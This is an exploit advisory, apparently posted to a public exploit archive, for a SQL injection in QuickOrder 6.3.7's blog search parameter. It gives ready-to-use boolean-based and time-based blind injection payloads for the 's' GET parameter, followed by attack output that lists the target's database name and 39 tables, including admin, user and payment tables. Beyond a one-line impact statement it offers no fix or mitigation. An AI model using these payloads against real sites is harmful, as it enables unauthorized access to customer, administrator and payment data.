Headline
QuickOrder 6.3.7 SQL Injection
QuickOrder version 6.3.7 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://quickorder.by-code.com ││ Vendor : bylancer ││ Software : QuickOrder 6.3.7 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /bloghttps://website/blog?s=[SQLI]GET parameter 's' is vulnerable to SQL Injection---Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=1') OR 02445=2445 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z---[+] Starting the Attackfetching current databasecurrent database: 'quickordercode_**'fetching tables[39 tables]+-------------------------+| qr_orders || qr_order_items || qr_blog_comment || qr_payments || qr_menu_variants || qr_options || qr_time_zones || qr_countries || qr_restaurant || qr_blog_categories || qr_logs || qr_image_menu || qr_balance || qr_blog || qr_menu || qr_user || qr_pages || qr_menu_extras || qr_taxes || qr_upgrades || qr_usergroups || qr_faq_entries || qr_transaction || qr_restaurant_options || qr_languages || qr_admins || qr_allergies || qr_user_options || qr_order_item_extras || qr_subscriptions || qr_menu_variant_options || qr_plans || qr_testimonials || qr_plan_options || qr_catagory_main || qr_currencies || qr_restaurant_view || qr_waiter_call || qr_blog_cat_relation |+-------------------------+ [-] Done